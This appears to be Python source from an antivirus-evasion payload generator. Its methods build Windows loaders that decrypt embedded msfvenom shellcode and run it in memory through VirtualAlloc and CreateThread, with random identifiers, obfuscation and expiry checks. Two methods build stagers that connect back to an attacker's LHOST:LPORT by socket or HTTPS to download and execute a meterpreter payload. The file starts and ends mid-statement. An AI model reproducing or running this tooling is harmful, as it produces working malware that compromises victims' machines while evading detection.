base64\n" PayloadCode += "import os\n" PayloadCode += "from datetime import datetime\n" PayloadCode += "from datetime import date\n\n" PayloadCode += RandToday + " = datetime.now()\n" PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n' PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n" PayloadCode += "\t" + RandPadding + " = '{'\n" PayloadCode += ( "\t" + RandDecodeAES + " = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(" + RandPadding + ")\n" ) PayloadCode += "\t" + RandCipherObject + " = AES.new('" + secret + "')\n" PayloadCode += ( "\t" + RandDecodedShellcode + " = " + RandDecodeAES + "(" + RandCipherObject + ", '" + EncodedShellcode + "')\n" ) PayloadCode += ( "\t" + RandShellCode + " = bytearray(" + RandDecodedShellcode + '.decode("string_escape"))\n' ) 
PayloadCode += ( "\t" + RandPtr + " = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(" + RandShellCode + ")),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" ) PayloadCode += ( "\t" + RandBuf + " = (ctypes.c_char * len(" + RandShellCode + ")).from_buffer(" + RandShellCode + ")\n" ) PayloadCode += ( "\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(" + RandPtr + ")," + RandBuf + ",ctypes.c_int(len(" + RandShellCode + ")))\n" ) PayloadCode += ( "\t" + RandHt + " = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(" + RandPtr + "),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" ) PayloadCode += ( "\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(" + RandHt + "),ctypes.c_int(-1))\n" ) if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: if self.required_options["expire_payload"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, secret) = encryption.encryptAES(Shellcode) # Create Payload code PayloadCode = "from ctypes import *\n" PayloadCode += "from Crypto.Cipher import AES\n" PayloadCode += "import base64\n" PayloadCode += "import os\n" PayloadCode += RandPadding + " = '{'\n" PayloadCode += ( RandDecodeAES + " = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(" + RandPadding + ")\n" ) PayloadCode += 
RandCipherObject + " = AES.new('" + secret + "')\n" PayloadCode += ( RandDecodedShellcode + " = " + RandDecodeAES + "(" + RandCipherObject + ", '" + EncodedShellcode + "')\n" ) PayloadCode += ShellcodeVariableName + " = " + RandDecodedShellcode + '.decode("string_escape")\n' PayloadCode += ( RandMemoryShell + " = create_string_buffer(" + ShellcodeVariableName + ", len(" + ShellcodeVariableName + "))\n" ) PayloadCode += RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n" PayloadCode += RandShellcode + "()" if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, secret) = encryption.encryptAES(Shellcode) # Create Payload code PayloadCode = "from ctypes import *\n" PayloadCode += "from Crypto.Cipher import AES\n" PayloadCode += "import base64\n" PayloadCode += "import os\n" PayloadCode += "from datetime import datetime\n" PayloadCode += "from datetime import date\n\n" PayloadCode += RandToday + " = datetime.now()\n" PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + 
'","%y-%m-%d") \n' PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n" PayloadCode += "\t" + RandPadding + " = '{'\n" PayloadCode += ( "\t" + RandDecodeAES + " = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(" + RandPadding + ")\n" ) PayloadCode += "\t" + RandCipherObject + " = AES.new('" + secret + "')\n" PayloadCode += ( "\t" + RandDecodedShellcode + " = " + RandDecodeAES + "(" + RandCipherObject + ", '" + EncodedShellcode + "')\n" ) PayloadCode += ( "\t" + ShellcodeVariableName + " = " + RandDecodedShellcode + '.decode("string_escape")\n' ) PayloadCode += ( "\t" + RandMemoryShell + " = create_string_buffer(" + ShellcodeVariableName + ", len(" + ShellcodeVariableName + "))\n" ) PayloadCode += "\t" + RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n" PayloadCode += "\t" + RandShellcode + "()" if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode
def generate(self): self._validateArchitecture() # randomize all of the variable names used shellCodeName = helpers.randomString() socketName = helpers.randomString() intervalName = helpers.randomString() attemptsName = helpers.randomString() getDataMethodName = helpers.randomString() fdBufName = helpers.randomString() rcvStringName = helpers.randomString() rcvCStringName = helpers.randomString() injectMethodName = helpers.randomString() tempShellcodeName = helpers.randomString() shellcodeBufName = helpers.randomString() fpName = helpers.randomString() tempCBuffer = helpers.randomString() payloadCode = "import struct, socket, binascii, ctypes, random, time\n" # socket and shellcode variables that need to be kept global payloadCode += "%s, %s = None, None\n" % (shellCodeName,socketName) # build the method that creates a socket, connects to the handler, # and downloads/patches the meterpreter .dll payloadCode += "def %s():\n" %(getDataMethodName) payloadCode += "\ttry:\n" payloadCode += "\t\tglobal %s\n" %(socketName) # build the socket and connect to the handler payloadCode += "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" %(socketName) payloadCode += "\t\t%s.connect(('%s', %s))\n" %(socketName,self.required_options["LHOST"][0],self.required_options["LPORT"][0]) # pack the underlying socket file descriptor into a c structure payloadCode += "\t\t%s = struct.pack('<i', %s.fileno())\n" % (fdBufName,socketName) # unpack the length of the payload, received as a 4 byte array from the handler payloadCode += "\t\tl = struct.unpack('<i', str(%s.recv(4)))[0]\n" %(socketName) payloadCode += "\t\t%s = \" \"\n" % (rcvStringName) # receive ALL of the payload .dll data payloadCode += "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (rcvStringName, rcvStringName, socketName) payloadCode += "\t\t%s = ctypes.create_string_buffer(%s, len(%s))\n" % (rcvCStringName,rcvStringName,rcvStringName) # prepend a little assembly magic to push the socket fd into the edi register 
payloadCode += "\t\t%s[0] = binascii.unhexlify('BF')\n" %(rcvCStringName) # copy the socket fd in payloadCode += "\t\tfor i in xrange(4): %s[i+1] = %s[i]\n" % (rcvCStringName, fdBufName) payloadCode += "\t\treturn %s\n" % (rcvCStringName) payloadCode += "\texcept: return None\n" # build the method that injects the .dll into memory payloadCode += "def %s(%s):\n" %(injectMethodName,tempShellcodeName) payloadCode += "\tif %s != None:\n" %(tempShellcodeName) payloadCode += "\t\t%s = bytearray(%s)\n" %(shellcodeBufName,tempShellcodeName) # allocate enough virtual memory to stuff the .dll in payloadCode += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(fpName,shellcodeBufName) # virtual lock to prevent the memory from paging out to disk payloadCode += "\t\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))\n" %(fpName,shellcodeBufName) payloadCode += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(tempCBuffer,shellcodeBufName,shellcodeBufName) # copy the .dll into the allocated memory payloadCode += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))\n" %(fpName,tempCBuffer,shellcodeBufName) # kick the thread off to execute the .dll payloadCode += "\t\tht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(fpName) # wait for the .dll execution to finish payloadCode += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))\n" # set up expiration options if specified if self.required_options["expire_payload"][0].lower() == "x": # download the stager payloadCode += "%s = %s()\n" %(shellCodeName, getDataMethodName) # inject what we grabbed payloadCode += "%s(%s)\n" % (injectMethodName,shellCodeName) else: # Get our current date and add number of days to the date todaysdate = date.today() 
expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0]))) randToday = helpers.randomString() randExpire = helpers.randomString() payloadCode += 'from datetime import datetime\n' payloadCode += 'from datetime import date\n\n' payloadCode += randToday + ' = datetime.now()\n' payloadCode += randExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' payloadCode += 'if ' + randToday + ' < ' + randExpire + ':\n' # download the stager payloadCode += "\t%s = %s()\n" %(shellCodeName, getDataMethodName) # inject what we grabbed payloadCode += "\t%s(%s)\n" % (injectMethodName,shellCodeName) if self.required_options["use_pyherion"][0].lower() == "y": payloadCode = encryption.pyherion(payloadCode) return payloadCode
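def generate(self):
    """Emit Python source that AES-decrypts an embedded shellcode blob and runs it in-process.

    Options read from ``self.required_options`` (each value is ``[value, ...]``):

    * ``inject_method`` -- ``"virtual"``: ``VirtualAlloc`` + ``RtlMoveMemory`` +
      ``CreateThread``; ``"heap"``: the same from a ``HeapCreate``/``HeapAlloc``
      block; any other value: ``create_string_buffer`` cast to ``CFUNCTYPE`` and called.
    * ``expire_payload`` -- ``"x"`` for no expiry, otherwise a number of days; the
      loader is then wrapped in ``if datetime.now() < <build date + days>:``.
    * ``use_pyherion`` -- ``"y"`` passes the finished source through
      ``encryption.pyherion``.

    Returns the generated source as a ``str``.

    NOTE(review):
    * The AES key ``secret`` is written into the emitted source in clear, so the
      encryption only hides the shellcode from static string matching; anyone who
      holds the file can recover it.
    * ``AES.new(secret)`` is emitted without a mode argument, so the target side uses
      the library default (ECB for PyCrypto); this, and the ``rstrip('{')`` padding
      removal, must match what ``encryption.encryptAES`` does -- confirm there.
    * The expiry guard compares naive local time on the target and is advisory only.
    * The two ``heap`` branches previously called ``crypters.pyherion`` while every
      other branch called ``encryption.pyherion``; all paths now use ``encryption``.
    * The six near-identical copies (three methods x with/without expiry) are
      collapsed into one body-building path; the emitted code is unchanged apart
      from which random identifiers land where.
    """
    inject_method = self.required_options["inject_method"][0].lower()
    expire_option = self.required_options["expire_payload"][0].lower()

    # Generate shellcode using msfvenom, then encrypt it with a per-build random key.
    shellcode = self.shellcode.generate()
    (encoded_shellcode, secret) = encryption.encryptAES(shellcode)

    # Randomised identifiers for the emitted source.
    rand_padding = helpers.randomString()
    rand_decode_aes = helpers.randomString()
    rand_cipher = helpers.randomString()
    rand_decoded = helpers.randomString()
    rand_shellcode = helpers.randomString()
    rand_ptr = helpers.randomString()
    rand_buf = helpers.randomString()
    rand_ht = helpers.randomString()

    # Decrypt-and-unescape prologue shared by every injection method.
    body = [
        rand_padding + ' = \'{\'\n',
        rand_decode_aes + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + rand_padding + ')\n',
        rand_cipher + ' = AES.new(\'' + secret + '\')\n',
        rand_decoded + ' = ' + rand_decode_aes + '(' + rand_cipher + ', \'' + encoded_shellcode + '\')\n',
    ]

    if inject_method in ("virtual", "heap"):
        ctypes_import = 'import ctypes\n'
        body.append(rand_shellcode + ' = bytearray(' + rand_decoded + '.decode("string_escape"))\n')
        if inject_method == "virtual":
            # PAGE_EXECUTE_READWRITE (0x40) region, MEM_COMMIT | MEM_RESERVE (0x3000).
            body.append(rand_ptr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + rand_shellcode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n')
        else:
            heap_var = helpers.randomString()
            body.append(heap_var + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + rand_shellcode + ') * 2),ctypes.c_int(0))\n')
            body.append(rand_ptr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + heap_var + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + rand_shellcode + ')))\n')
        # Copy into the allocation, run it on a new thread, wait for it to finish.
        body += [
            rand_buf + ' = (ctypes.c_char * len(' + rand_shellcode + ')).from_buffer(' + rand_shellcode + ')\n',
            'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + rand_ptr + '),' + rand_buf + ',ctypes.c_int(len(' + rand_shellcode + ')))\n',
            rand_ht + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + rand_ptr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n',
            'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + rand_ht + '),ctypes.c_int(-1))\n',
        ]
    else:
        # Void-pointer method: no Windows API calls, the buffer is cast to a function.
        rand_memory = helpers.randomString()
        rand_func = helpers.randomString()
        ctypes_import = 'from ctypes import *\n'
        body += [
            rand_shellcode + ' = ' + rand_decoded + '.decode("string_escape")\n',
            rand_memory + ' = create_string_buffer(' + rand_shellcode + ', len(' + rand_shellcode + '))\n',
            rand_func + ' = cast(' + rand_memory + ', CFUNCTYPE(c_void_p))\n',
            rand_func + '()',  # the original emitted no trailing newline here
        ]

    payload_code = ctypes_import
    payload_code += 'from Crypto.Cipher import AES\n'
    payload_code += 'import base64\n'
    payload_code += 'import os\n'

    if expire_option == "x":
        payload_code += ''.join(body)
    else:
        # Build date plus N days, emitted as YY-MM-DD (the century is sliced off).
        expire_date = str(date.today() + timedelta(days=int(self.required_options["expire_payload"][0])))
        rand_today = helpers.randomString()
        rand_expire = helpers.randomString()
        payload_code += 'from datetime import datetime\n'
        payload_code += 'from datetime import date\n\n'
        payload_code += rand_today + ' = datetime.now()\n'
        payload_code += rand_expire + ' = datetime.strptime(\"' + expire_date[2:] + '\",\"%y-%m-%d\") \n'
        payload_code += 'if ' + rand_today + ' < ' + rand_expire + ':\n'
        payload_code += ''.join('\t' + line for line in body)

    if self.required_options["use_pyherion"][0].lower() == "y":
        payload_code = encryption.pyherion(payload_code)
    return payload_code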
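def generate(self):
    """Emit Python source that embeds raw shellcode as a string literal and runs it in-process.

    Options read from ``self.required_options`` (each value is ``[value, ...]``):

    * ``inject_method`` -- ``"virtual"``: ``VirtualAlloc`` + ``RtlMoveMemory`` +
      ``CreateThread``; ``"heap"``: the same from a ``HeapCreate``/``HeapAlloc``
      block; any other value: ``create_string_buffer`` cast to ``CFUNCTYPE`` and called.
    * ``expire_payload`` -- ``"x"`` for no expiry, otherwise a number of days; the
      loader is then wrapped in ``if datetime.now() < <build date + days>:``.
    * ``use_pyherion`` -- ``"y"`` passes the finished source through
      ``encryption.pyherion``.

    Returns the generated source as a ``str``.

    NOTE(review):
    * Unlike the AES variant, the value returned by ``self.shellcode.generate()`` is
      written into the emitted source verbatim inside a quoted literal, so it is
      fully visible to static inspection of the output file.
    * The expiry guard compares naive local time on the target and is advisory only.
    * The six near-identical copies (three methods x with/without expiry) are
      collapsed into one body-building path; the emitted code is unchanged apart
      from which random identifiers land where.
    """
    inject_method = self.required_options["inject_method"][0].lower()
    expire_option = self.required_options["expire_payload"][0].lower()

    # Generate shellcode using msfvenom.
    shellcode = self.shellcode.generate()

    # Randomised identifiers for the emitted source.
    rand_shellcode = helpers.randomString()
    rand_ptr = helpers.randomString()
    rand_buf = helpers.randomString()
    rand_ht = helpers.randomString()

    if inject_method in ("virtual", "heap"):
        ctypes_import = 'import ctypes\n'
        body = [rand_shellcode + ' = bytearray(\'' + shellcode + '\')\n']
        if inject_method == "virtual":
            # PAGE_EXECUTE_READWRITE (0x40) region, MEM_COMMIT | MEM_RESERVE (0x3000).
            body.append(rand_ptr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + rand_shellcode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n')
        else:
            heap_var = helpers.randomString()
            body.append(heap_var + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + rand_shellcode + ') * 2),ctypes.c_int(0))\n')
            body.append(rand_ptr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + heap_var + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + rand_shellcode + ')))\n')
        # Copy into the allocation, run it on a new thread, wait for it to finish.
        body += [
            rand_buf + ' = (ctypes.c_char * len(' + rand_shellcode + ')).from_buffer(' + rand_shellcode + ')\n',
            'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + rand_ptr + '),' + rand_buf + ',ctypes.c_int(len(' + rand_shellcode + ')))\n',
            rand_ht + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + rand_ptr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n',
            'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + rand_ht + '),ctypes.c_int(-1))\n',
        ]
    else:
        # Void-pointer method: no Windows API calls, the buffer is cast to a function.
        rand_memory = helpers.randomString()
        rand_func = helpers.randomString()
        ctypes_import = 'from ctypes import *\n'
        body = [
            rand_shellcode + ' = \"' + shellcode + '\"\n',
            rand_memory + ' = create_string_buffer(' + rand_shellcode + ', len(' + rand_shellcode + '))\n',
            rand_func + ' = cast(' + rand_memory + ', CFUNCTYPE(c_void_p))\n',
            rand_func + '()',  # the original emitted no trailing newline here
        ]

    payload_code = ctypes_import

    if expire_option == "x":
        payload_code += ''.join(body)
    else:
        # Build date plus N days, emitted as YY-MM-DD (the century is sliced off).
        expire_date = str(date.today() + timedelta(days=int(self.required_options["expire_payload"][0])))
        rand_today = helpers.randomString()
        rand_expire = helpers.randomString()
        payload_code += 'from datetime import datetime\n'
        payload_code += 'from datetime import date\n\n'
        payload_code += rand_today + ' = datetime.now()\n'
        payload_code += rand_expire + ' = datetime.strptime(\"' + expire_date[2:] + '\",\"%y-%m-%d\") \n'
        payload_code += 'if ' + rand_today + ' < ' + rand_expire + ':\n'
        payload_code += ''.join('\t' + line for line in body)

    if self.required_options["use_pyherion"][0].lower() == "y":
        payload_code = encryption.pyherion(payload_code)
    return payload_code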
def generate(self):
    """Emit a Python 2 stager that fetches a payload over HTTPS and runs it in-process.

    The generated script (``urllib2``/``xrange``/``except X, e`` -- Python 2 only):

    1. defines a checksum helper (sum of byte values mod 0x100) and a routine that
       tries random 4-character strings until one has checksum 92, used as the
       request URI;
    2. requests ``https://<LHOST>:<LPORT>/<uri>`` through ``urllib2`` with a fixed
       MSIE User-Agent (a bare ``ProxyHandler()`` is installed first, so the target's
       system proxy settings apply); the body is returned only when
       ``Content-Length`` exceeds 100000, or unconditionally when that header cannot
       be read; any ``URLError`` yields ``''``;
    3. copies a non-empty response into a ``VirtualAlloc`` region, runs it on a new
       thread and waits for the thread to finish.

    ``LHOST``/``LPORT`` are read with upper-case keys while ``use_pyherion`` uses
    lower case -- NOTE(review): confirm both spellings exist in this module's
    option table, otherwise one of the lookups raises ``KeyError``.
    ``use_pyherion == "y"`` wraps the finished source in ``encryption.pyherion``.

    NOTE(review): the emitted ``urlopen`` passes no SSL context, so certificate
    handling is whatever the target's Python does by default; the checksum value
    92 is presumably what the listening handler keys on -- verify against it.

    Returns the generated source as a ``str``.
    """
    # Randomised identifiers for everything defined in the emitted script
    # (same draw order as before, so name placement is unchanged).
    fn_sum = helpers.randomString()
    fn_checkin = helpers.randomString()
    v_letters = helpers.randomString()
    v_letter = helpers.randomString()
    v_base = helpers.randomString()
    fn_download = helpers.randomString()
    p_host = helpers.randomString()
    p_port = helpers.randomString()
    v_request = helpers.randomString()
    v_response = helpers.randomString()
    fn_inject = helpers.randomString()
    p_data = helpers.randomString()
    v_bytes = helpers.randomString()
    v_ptr = helpers.randomString()
    v_buf = helpers.randomString()
    v_handle = helpers.randomString()
    v_payload = helpers.randomString()
    v_proxy = helpers.randomString()
    v_opener = helpers.randomString()

    script = [
        "import urllib2, string, random, struct, ctypes, httplib, time\n",
        # checksum helper: sum of byte values modulo 0x100
        "def " + fn_sum + "(s): return sum([ord(ch) for ch in s]) % 0x100\n",
        # URI search: a random 3-char base plus one letter whose checksum is 92
        "def " + fn_checkin + "():\n\tfor x in xrange(64):\n",
        "\t\t" + v_base + " = ''.join(random.sample(string.ascii_letters + string.digits,3))\n",
        "\t\t" + v_letters + " = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))\n",
        "\t\tfor " + v_letter + " in " + v_letters + ":\n",
        "\t\t\tif " + fn_sum + "(" + v_base + " + " + v_letter + ") == 92: return " + v_base + " + " + v_letter + "\n",
        # download routine: HTTPS GET via urllib2 with system proxy settings
        "def " + fn_download + "(" + p_host + "," + p_port + "):\n",
        "\t" + v_proxy + " = urllib2.ProxyHandler()\n",
        "\t" + v_opener + " = urllib2.build_opener(" + v_proxy + ")\n",
        "\turllib2.install_opener(" + v_opener + ")\n",
        "\t" + v_request + " = urllib2.Request(\"https://%s:%s/%s\" %(" + p_host + "," + p_port + "," + fn_checkin + "()), None, {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'})\n",
        "\ttry:\n",
        "\t\t" + v_response + " = urllib2.urlopen(" + v_request + ")\n",
        "\t\ttry:\n",
        "\t\t\tif int(" + v_response + ".info()[\"Content-Length\"]) > 100000: return " + v_response + ".read()\n",
        "\t\t\telse: return ''\n",
        "\t\texcept: return " + v_response + ".read()\n",
        "\texcept urllib2.URLError, e: return ''\n",
        # inject routine: VirtualAlloc + RtlMoveMemory + CreateThread + wait
        "def " + fn_inject + "(" + p_data + "):\n",
        "\tif " + p_data + " != \"\":\n",
        "\t\t" + v_bytes + " = bytearray(" + p_data + ")\n",
        "\t\t" + v_ptr + " = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(" + v_bytes + ")), ctypes.c_int(0x3000),ctypes.c_int(0x40))\n",
        "\t\t" + v_buf + " = (ctypes.c_char * len(" + v_bytes + ")).from_buffer(" + v_bytes + ")\n",
        "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(" + v_ptr + ")," + v_buf + ", ctypes.c_int(len(" + v_bytes + ")))\n",
        "\t\t" + v_handle + " = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(" + v_ptr + "),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n",
        "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(" + v_handle + "),ctypes.c_int(-1))\n",
        # entry point: download from LHOST:LPORT, then inject whatever came back
        v_payload + " = ''\n",
        "%s = %s(\"%s\", %s)\n" % (v_payload, fn_download, self.required_options["LHOST"][0], self.required_options["LPORT"][0]),
        fn_inject + "(" + v_payload + ")\n",
    ]
    source = "".join(script)

    if self.required_options["use_pyherion"][0].lower() == "y":
        source = encryption.pyherion(source)
    return source
def generate(self):
    """Build a Python 2 script that embeds DES-encrypted shellcode and runs it.

    Six near-identical branches are selected by two options:

    * INJECT_METHOD: "virtual" (VirtualAlloc), "heap" (HeapCreate/HeapAlloc),
      anything else (ctypes create_string_buffer + CFUNCTYPE cast).
    * EXPIRE_PAYLOAD: "x" emits an unconditional script; any other value is
      parsed as a number of days and the emitted script only proceeds while
      datetime.now() is before today + that many days.

    In every branch the shellcode comes from self.shellcode.generate(), is
    encrypted with encryption.encryptDES(), and the ciphertext, the DES key
    and the IV are all written into the emitted script as string literals —
    so the encryption only obscures the blob in the artifact; the script
    itself contains everything needed to recover it.  Identifiers in the
    emitted script come from helpers.randomString().  Returns the script
    source as a str, optionally passed through encryption.pyherion() when
    USE_PYHERION is "y".

    `date` and `timedelta` are presumably from the datetime module; their
    import is outside this listing.  Several Rand* names in the last two
    branches are assigned but never used.
    """
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate(self.required_options)

            # Generate Random Variable Names
            RandPtr = helpers.randomString()
            RandBuf = helpers.randomString()
            RandHt = helpers.randomString()
            ShellcodeVariableName = helpers.randomString()
            RandIV = helpers.randomString()
            RandDESKey = helpers.randomString()
            RandDESPayload = helpers.randomString()
            RandEncShellCodePayload = helpers.randomString()

            # encrypt the shellcode and get our randomized key/iv
            (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)

            # Create Payload File
            # key, IV and ciphertext are embedded as literals in the emitted script
            PayloadCode = 'from Crypto.Cipher import DES\n'
            PayloadCode += 'import ctypes as avlol\n'
            PayloadCode += RandIV + ' = \'' + iv + '\'\n'
            PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
            PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
            PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
            PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
            # 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
            PayloadCode += RandPtr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len('+ ShellcodeVariableName +')),avlol.c_int(0x3000),avlol.c_int(0x40))\n'
            PayloadCode += RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
            PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
            PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
            PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))'

            if self.required_options["USE_PYHERION"][0].lower() == "y":
                PayloadCode = encryption.pyherion(PayloadCode)

            return PayloadCode

        else:
            # Get our current date and add number of days to the date
            # str(date) is "YYYY-MM-DD"; the [2:] slice below drops the century so
            # the emitted script can parse it with "%y-%m-%d"
            todaysdate = date.today()
            expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate(self.required_options)

            # Generate Random Variable Names
            RandPtr = helpers.randomString()
            RandBuf = helpers.randomString()
            RandHt = helpers.randomString()
            ShellcodeVariableName = helpers.randomString()
            RandIV = helpers.randomString()
            RandDESKey = helpers.randomString()
            RandDESPayload = helpers.randomString()
            RandEncShellCodePayload = helpers.randomString()
            RandToday = helpers.randomString()
            RandExpire = helpers.randomString()

            # encrypt the shellcode and get our randomized key/iv
            (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)

            # Create Payload File
            # the expiry check compares local datetime.now() to the embedded date;
            # everything after the `if` is tab-indented under it
            PayloadCode = 'from Crypto.Cipher import DES\n'
            PayloadCode += 'import ctypes as avlol\n'
            PayloadCode += 'from datetime import datetime\n'
            PayloadCode += 'from datetime import date\n\n'
            PayloadCode += RandToday + ' = datetime.now()\n'
            PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
            PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
            PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
            PayloadCode += '\t' + RandDESKey + ' = \'' + DESKey + '\'\n'
            PayloadCode += '\t' + RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
            PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
            PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
            PayloadCode += '\t' + RandPtr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len('+ ShellcodeVariableName +')),avlol.c_int(0x3000),avlol.c_int(0x40))\n'
            PayloadCode += '\t' + RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
            PayloadCode += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
